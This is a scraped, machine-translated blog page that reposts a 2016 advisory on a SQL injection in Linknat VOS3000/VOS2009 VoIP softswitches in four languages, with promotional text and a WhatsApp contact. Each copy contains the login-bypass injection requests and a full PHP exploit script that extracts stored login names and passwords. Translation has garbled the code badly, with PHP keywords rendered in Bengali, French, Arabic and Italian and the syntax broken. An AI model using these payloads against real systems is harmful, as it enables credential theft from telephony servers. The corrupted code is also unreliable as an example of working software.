    $sep = '+-'। ('-+-', $sep)। '-+';
    $buf = অ্যারে ($sep, vsprintf($fmt, $keys), $sep);
    $row হিসেবে $data) {
        $buf = vsprintf($fmt, $row);
        $buf = $sep;
    }
    রিটার্ন ই[]ম্প্রোভাইজ ("n", $buf);
}

ব্যানার();[]
"n";
প্রতিধ্বনি "টার্গেট: $hostn";
প্রতিধ্বনি "কলাম #1: $column_একn";
প্রতিধ্বনি "কলাম #2: $column_2n";
প্রতিধ্বনি "টেবিল: $tablen";
প্রতিধ্বনি "অন্যান্য: $othern";
"n";

$results = অ্যারে();
$count_ফলাফল = জিজ্ঞাসা ($host, "নির্বাচন করুন 1,2,Count(*), 4,5,6 থেকে $table
$other");
যদি ($count_ফলাফল) {
    $count = intval ($count_ফলাফল);
    প্রতিধ্বনি "খুঁজে $count সারি...n";

$i=0[0]; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=[0]" . hex2bin($result) .
" n";="" }="" else="" {="[1]" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" ==""[]> হেক্স২বিন($result), $column_টু
=> হেক্[0]স২বিন($result);।
    }

যদি (গণনা([1]$results) > 0) {
        প্রতিধ্বনি "nn"। ascii_table($results)। "n";
    }
} অন্যথায় {
    প্রতিধ্বনি "সারি গণনা পুনরুদ্ধারকরতে ত্রুটি";
}

?></$count;>

2016 থেকে যারা VOS3000 হ্যাক করার জন্য কিছু SQL ইনজেকশন নরম সামগ্রী ব্যবহার করে, আমাদের নিজস্ব নিরাপত্তা ব্যবস্থা আছে, আমরা এখন আমাদের নিরাপত্তা ব্যবস্থা খুব শক্তিশালী, আমার কাজের ফোকাস সবসময় ভিওআইপি সফট-সুইচের জন্য নিরাপত্তার জন্য ছিল। বেশিরভাগ সময় আমি বিনামূল্যে উপদেশ দিতাম অথবা যতটা সম্ভব বিনামূল্যে তথ্য শেয়ার করতাম। এখনো অনেক নোংরা জিনিস ঘুরে বেড়াচ্ছে, তাই দয়া করে সবসময় সাবধান থাকুন এবং আরো জানুন। অন্যথায় আপনি কখনোই ভাল ব্যবসা করতে পারবেন না। আজকাল যারা VOS3000 ক্লায়েন্ট সফটওয়্যারে লুকানো স্ক্রিপ্ট বা ম্যালওয়্যার ব্যবহার করে VOS সার্ভার হ্যাক করে.

আরও সাহায্যের জন্য আমাকে হোয়াটসঅ্যাপে নক করুন: +880191119966 – আমি সব উপায়ে সাহায্য করব।

COMMENT VOS3000 Get Hacked par SQL Injection Script, empêcher le piratage!

June 4, 2019November 22, 2020 king

Injection SQL Linknat VOS2009/VOS3000


De: Osama Khalid <osama ()="" codinghazard="" com="">D
ate: Thu, 19 mai 2016 16:52:54 +0500</osama>


Une injection SQL a été trouvée dans Linknat VOS3000/VOS2009, un VoIP populaire
softswitch, qui pourrait permettre aux attaquants distants d’accéder à la
informations d’identification stockées en texte brut.

Application: Linknat VOS3000/VOS2009
Versions concernées: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL du fournisseur : http://www.linknat.com/
Bug: SQLi (avec privilèges DBA)
Type: Télécommande
Résolution : Correction, mise à niveau vers 2.1.2.4 ou 2.1.6.0 Version propre
Référence: Wooyun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

Le SQLi signalé est aveugle basé sur le temps. Comme il ne s’agit pas d’un SQLi en bande, le
résultats peuvent être recueillis à partir de la sortie de bienvenue.jsp au cours de la même
Session.

(1ère demande)

POST http://target/eng/login.jsp
PARAM loginType=1
        name=' union select 1,2,@@version,'hello',5,6#
        pass=' OU ''='

(2ème demande au cours de la même session)

GET http://target/eng/welcome.jsp
RÉSULTAT 0|' sélection syndicale
1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|

<?[ EXPLOIT CODE ]php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one [1]  = isset($argv) ? $argv : "l[2]oginname"[2];
$column_two   = isset($argv) ? $argv : "pas[3]sword";
$[3]table        = isset($argv) ? $argv : "e_us[4]er";
$oth[4]er        = isset($argv) ? $argv : "";

f[5]unction b[5]anner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.p[HOST]hp 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        avantach ( $post comme $key => $value)
            $post_items = $key . '=' . urlencode($value);
      []  $post_string = implose('',$post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data de retour;
}

requête de fonction($host, $query) {
    $data = curl(« http://$host/eng/login.jsp »;, tableau(
            « loginType » => 1,
            « nom » => « ' union « . $query . "#",
            « pass » => « ' OU ''=' »
        ), null, vrai);
    preg_match_all('| Set-Cookie: (.*);|U', $data, $matches);
    $cookies = implose( »; ' $matches);
    $data = curl(« http://$host/en[1]g/welcome.jsp »;, array(), $cookies, false);
    $parts = explode(« | », trim($data));

si (compte($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data[3]) {
    [4]$keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = max($wid, strlen($v));
    }
    foreach($[$k]wid comme $k[$k] => $v) {
        $fmt = « %-{$v}s »;
        $sep = str_repeat('-[$k]', $v);
    }
    $fmt = '|[$k] ' . imploser(' | ', $fmt) . ' |';
    $sep = '+-' . imploser('-+-', $sep) . '-+';
    $buf = tableau($sep, vsprintf($fmt, $keys), $sep);
    foreach($data comme $row) {
        $buf = vsprintf($fmt, $row);
        $buf = $[]sep;
    }
    retour implode(« n », []$buf);
}

bannière();
écho « n »;
écho « Cible: $hostn »;
écho « Colonne #1: $column_onen »;
écho « Colonne #2: $column_twon »;
écho « Table: $tablen »;
écho « Autre: $othern »;
écho « n »;

$results = tableau();
$count_result = query($host, « SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other »);
si ($count_result) {
    $count = intval($count_result);
    écho « Trouvé $count lignes...n [0]»;

pour ($i=0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column[0]_two="" .="" "=" . hex2bin($result) .
" n";="" }[1]="" else="" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($co[]lumn_one" ==""> hex2bin($result), $colum[0]n_two
=> hex2bin($result));
    }
[1]
si (compte($results) > 0) {
        écho « nn » . ascii_table($results) . « n »;
    }
} autre {
    écho « error retriving row count » ;
}

?></$count;>

À partir de 2016 Les gens utilisant quelques articles doux d’injection SQL pour pirater VOS3000, Nous avons notre propre système de sécurité à partir de ce moment, nous avons mis à jour notre système de sécurité trop fort maintenant, mon objectif de travail a toujours été pour la sécurité pour voip soft-switch. La plupart du temps, j’ai donné des conseils gratuits ou partagé des informations autant possible gratuitement. Pourtant, il ya beaucoup de choses sales courir autour, donc s’il vous plaît être prudent toujours et en savoir plus. Sinon, vous ne serez jamais en mesure de faire de bonnes affaires jamais. Maintenant-un-jours Personnes utilisant des scripts cachés ou des logiciels malveillants dans le logiciel client VOS3000 pour pirater VOS Server.

Pour plus d’aide Frappez-moi dans WhatsApp: +8801911119966 – je vais faire aider tous les moyens.

كيف VOS3000 الحصول على اختراق من قبل SQL حقن البرنامج النصي، ومنع القرصنة!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 حقن SQL


من: أسامة خالد <osama ()="" codinghazard="" com="">التاري
خ: الخميس, 19 مايو 2016 16:52:54 +0500</osama>


تم العثور على حقنة SQL في لينكنات VOS3000/VOS2009، وهو VoIP شعبية
softswitch، التي يمكن أن تسمح للمهاجمين عن بعد للوصول إلى
بيانات الاعتماد المخزنة في نص عادي.

التطبيق: لينكنات VOS3000/VOS2009
الإصدارات المتأثرة: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL البائع: http://www.linknat.com/
خطأ: SQLi (مع امتيازات DBA)
النوع: عن بعد
القرار: ثابت، الترقية إلى 2.1.2.4 أو 2.1.6.0 النسخة النظيفة
المرجع: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi ذكرت هي عمياء القائمة على الزمن. نظرا لأنه ليس في النطاق SQLi ، و
ويمكن جمع النتائج من الناتج من الترحيب .jsp خلال نفس
الدوره.

(الطلب الأول)

http://target/eng/login.jsp
تسجيل الدخول PARAMاًايناًالم
        name=' حدد الاتحاد 1,2,@@version,'مرحبا',5,6#
        تمرير =' أو ''='

(الطلب الثاني خلال الدورة نفسها)

الحصول على http://target/eng/welcome.jsp
اختيار 0|'الاتحاد
1,2,@@version,'مرحباً',5,6#|1|5.0.51a-المجتمع|مرحباً|0.00|0.00|||

<?php
#
#[ EXPLOIT CODE ] Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   [1]= isset($argv) ? $argv : "log[2]inname";
[2]$column_two   = isset($argv) ? $argv : "pass[3]word";
$t[3]able        = isset($argv) ? $argv : "e_us[4]er";
$othe[4]r        = isset($argv) ? $argv : "";

f[5]unction b[5]anner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos30[HOST]00.php 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vo[HOST]s[COL1]3[COL2]0[TABLE]0[OTHER SQL]0.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {20
        foreach ( $post $key = > $value)
            $post_items = $key . '=' . urlencode ($value[]) ؛
        $post_string = "الهدّة" ('&&'، $post_items)؛
        curl_setopt ($curl، CURLOPT_POST، 1)؛
        curl_setopt ($curl، CURLOPT_POSTFIELDS، $post_string)؛
    }
    $data = curl_exec ($curl)؛
    curl_close ($curl)؛
    العودة $data ، ولكن
}

استعلام الدالة($host، $query) {
    $data = حليقة ("http://$host/eng/login.jsp";, صفيف
            "loginType" = > 1،
            "name" => "الاتحاد" . $query . "#",
            "تمرير" = > "' أو ''='"
        )، فارغة، صحيحة)؛
    preg_match_all('| تعيين ملف تعريف الارتباط: (.*); |U'، $data، $matches)؛
    $cookies = تنهار ('؛ '، $matches)؛
    [1]$data = حليقة ("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts = تنفجر ("|", تقليم ($data));

إذا (العد($parts) < 7)
        return false;

    return array($parts, $parts);
[3]}

funct[4]ion ascii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = الحد الأقصى[$k] ($wid، str[$k]len($v))؛
    }
    foreach($wid $k = > $v) {
        $fmt = "%-{$[$k]v}s";
        $sep = str_r[$k]epeat ('-'، $v)؛
    }
    $fmt = '| ' . تنهار (' | '، $fmt) . ' |';
    $sep = '+-' . تنهار ('-+-'، $sep) . '-+';
    $buf = صفيف ($sep، $sep vsprintf($fmt، $keys)، و
    foreach($data كما $row)
        $buf = vsprintf ([]$fmt، $row)؛
        $buf = $sep؛
    []}
    العودة تنهار ("n", $buf);
}

راية();
echo "n";
صدى "الهدف: $hostn";
صدى "عمود #1: $column_onen";
صدى "العمود #2: $column_twon";
صدى "جدول: $tablen";
صدى "أخرى: $othern"؛
echo "n";

$results = صفيف();
$count_result = استعلام($host، "حدد 1,2,COUNT(*), 4,5,6 من $table
$other")؛
إذا ($count_result) {
    $count = intval ($count_result);
    echo "العثور على $count الصفوف...n"[0];

لـ ($i= 0؛ $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $colum[0]n_two="" .="" "=" . hex2bin($result) .
" n";="" [1]}="" else="" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array([]$column_one" ==""> سداسي عشري ($result)،[0] $column_two
=> سداسي عشري ($resu[1]lt));
    }

إذا (عدد($results) > 0) {
        echo "nn" . ascii_table($results) "n";
    }
} آخر {
    echo "خطأ في استرداد عدد الصفوف"؛
}

?></$count;>

من 2016 الناس باستخدام بعض أجهزة حقن SQL لينة الإختراق VOS3000, لدينا نظامنا الأمن الخاصة من ذلك الوقت, قمنا بتحديث نظامنا الأمني قوية جدا الآن, كان تركيز عملي دائما للأمن لvoip لينة التبديل. معظم الوقت أعطى نصيحة مجانية أو تبادل المعلومات قدر الإمكان مجانا. لا يزال هناك الكثير من الأشياء القذرة يركض، لذا يرجى توخي الحذر دائما ومعرفة المزيد. وإلا فإنك لن تكون قادرة على القيام بأعمال تجارية جيدة من أي وقت مضى. الآن في أيام الناس باستخدام البرامج النصية المخفية أو ملورس في VOS3000 برنامج العميل الإختراق VOS Server.

لمزيد من المساعدة تدق لي في ال WhatsApp: +880191119966 – سأفعل مساعدة جميع الطرق.

COME VOS3000 Ottenere Hacked da SQL Injection Script, prevenire l'hacking!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL injection


Da: Osama Khalid <osama ()="" codinghazard="" com="">D
ata: Giovedi, 19 Maggio 2016 16:52:54</osama>


Un'iniezione SQL è stata trovata in Linknat VOS3000/VOS2009, un voIP popolare
softswitch, che potrebbe consentire agli aggressori remoti di accedere al
credenziali memorizzate in testo normale.

Applicazione: Linknat VOS3000/VOS2009
Versioni interessate: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL fornitore: http://www.linknat.com/
Bug: SQLi (con privilegi DBA)
Tipo: Remoto
Soluzione: fisso, aggiornamento a 2.1.2.4 o 2.1.6.0 Versione pulita
Riferimento: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SqLi segnalato è cieco basato sul tempo. Poiché non si tratta di un SQLi in banda,
risultati possono essere raccolti dalla produzione di .jsp durante lo stesso
Sessione.

(prima richiesta)

POST http://target/eng/login.jsp
Tipo di login PARAM 1
        name: 'unione selezionare 1,2,@@version,'ciao',5,6
        pass: OR '''

(seconda richiesta durante la stessa sessione)

GET http://target/eng/welcome.jsp
RISULTATO 0'' unione select
1,2,@@version,'ciao',5,6' 1'5.0.51a-community'hello'0.[ EXPLOIT CODE ]0.00

<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $arg[1]v;
$column_one   = isset($arg[2]v) ? $arg[2]v : "loginname";
$column_two   = isset($argv[3]) ? $argv[3] : "password";
$table        = isset($argv[4]) ? $argv[4] : "e_user";
$other        = isset($argv)[5] ? $argv [5]: "";

function banner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";[HOST]
    echo "php vos3000.php 127.0.0.1n";
    echo "php vos3000.php     [HOST]n[COL1]"[COL2];[TABLE]
[OTHER SQL]    echo "php vos3000.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0)
        foreach ($post come $key di > $value)
            $post_items - $key .[] '=' . urlencode($value);
        $post_string : implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data : curl_exec ($curl);
    curl_close($curl);
    restituire $data;
}

funzione query($host, $query)
    $data : curl("http://$host/eng/login.jsp";, array(
            "loginType" - > 1,
            "nome" - > "' unione " . $query . "#",
            "pass" - > "' OR ''''"
        ), null, true);
    preg_match_all('' Set-Cookie: ($matches $data.
    $cookies : implodere('; ', $matches);
    $data : [1]curl("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts : esplodi ("""" , trim($data));

if (count($parts) < 7)
        return false;

    return array($parts, $parts);
}

func[3]tion asc[4]ii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid : max($wid, strlen([$k]$v));
    }[$k]
    foreach($wid come $k di > $v)
        $fmt: "%-$v";
        $[$k]sep : str_repeat ('-', $v)[$k];
    }
    $fmt : ' ' . implodere(' ', $fmt) . ' |';
    $sep di tipo '-' . implode ('--', $sep) . '-+';
    $buf: array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data come $row)
        $buf vsprintf($fmt, $row)[];
        $buf - $sep;
    }
    rest[]ituire implode(""n", $buf);
}

banner();
eco "n";
eco "Target: $host";
echo "#1: $column_one";
echo "Colonna #2: $column_due";
eco "Tabella: $table n";
eco "Altro: $other n";
eco "n";

$results : array();
$count_result : query($host, "SELECT 1,2,COUNT('),4,5,6 FROM $table
$other");
if ($count_result)
    $count : intval($count_result);
    echo "Trovato $count righe...

for ($i 0; $i<[0]$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=[0]" . hex2bin($result) .
" n";="" }="" else="" {="[1]" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" =="[]"> hex2bin($result), $column_2
<>a0></a[0]0> $result a1><
    }

if (count([1]$results) > 0)
        echo "n"n" . ascii_table($results) . "n";
    }
- altro .
    echo "Errore durante il recupero del numero di righe";
}

?></$count;>

Dal 2016 Persone che utilizzano alcuni prodotti soft iniezione sql per incidere VOS3000, Abbiamo il nostro sistema di sicurezza da quel momento, abbiamo aggiornato il nostro sistema di sicurezza troppo forte ora, il mio obiettivo di lavoro era sempre per la sicurezza per voip soft-switch. La maggior parte del tempo ho dato consigli gratuiti o informazioni condivise il più possibile gratuitamente. Ancora ci sono un sacco di cose sporche in giro, quindi si prega di stare attenti sempre e saperne di più. Altrimenti non sarai mai in grado di fare buoni affari mai. Ora-a-days Persone che utilizzano script nascosti o malware nel software client VOS3000 per hackerare VOS Server.

Per più aiuto Knock me in whatsapp: 8801911119966 – farò aiutare tutti i modi.

Posts navigation

Older Posts
Newer Posts

Recent Posts

  • Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
  • Portabilidad numérica LRN VOS3000 Proven consulta de carriers EE.UU.
  • Precisión decimal tarifas VOS3000 Accurate configuración FEE_PRECISTION y HOLD_TIME_PRECISION
  • Códigos respuesta SIP CDR VOS3000 Complete Important referencia de 30+ códigos
  • Reemplazo razón fallida VOS3000 Best Strategic configuración personalizada de errores
  • Detección interrupción RTP VOS3000 Accurate monitoreo de medios en cuatro modos
  • VOS3000 Replace Failed Reason Strategic Custom Error Response Configuration
  • VOS3000 Call Forward Signal Easy Recognition Smart SS_RECOGNIZE_CALL_FORWARD_SIGNAL
  • VOS3000 Remote Ring Back Mode Comprehensive Passthrough 183 180 Configuration
  • VOS3000 Callee Source Header Flexible To Request-Line Selection Important
  • VOS3000 Caller Source Header Selection Complete From Remote-Party-ID Display Important
  • VOS3000 LRN Number Portability Proven US Carrier Lookup Configuration
  • VOS3000 LRN Server Configuration Reliable SS_LRN_SERVER_IP PORT Setup
  • VOS3000 Server End Reasons Definitive Important 25-Code Reference Guide
  • VOS3000 H323 Q850 Cause Codes Comprehensive 60-Plus Code Reference
  • VOS3000 SIP Response Codes CDR Complete 30-Plus Important Code Reference
  • VOS3000 SIP Publish Expire: Essential Gateway Concurrency Guide
  • VOS3000 SIP Send Unregister: Essential Registration Cleanup Easy Guide
  • VOS3000 SIP Display From: Important E164 Caller Configuration
  • VOS3000 SIP Routing Gateway Contact: Essential INVITE Header Guide
  • VOS3000 SIP INVITE Timeout and Gateway Switching: Complete Call Setup Guide
  • VOS3000 SIP Privacy Header: Essential Caller ID Protection Guide
  • VOS3000 SIP Outbound Registration Parameters: Expiry and Retry Delay Easy Guide
  • VOS3000 SIP Call Progress Timeout: Complete Signal Chain Guide
  • VOS3000 SIP Resend Interval: Important Message Retransmission Guide
[email protected]
+8801911119966
Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!
VOS3000 API (2.1.9.07) Connection, Common issues, VOS3000 API easy GuideVOS3000 API (2.1.9.07) Connection, Common issues, VOS3000 API easy Guide
VOS3000 软交换系统完整技术指南(安装、服务器、价格与安全) ImportantVOS3000 软交换系统完整技术指南(安装、服务器、价格与安全) Important
VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!
Proudly powered by WordPress | Theme: Nucleare by CrestaProject.
Back to top
WhatsApp chat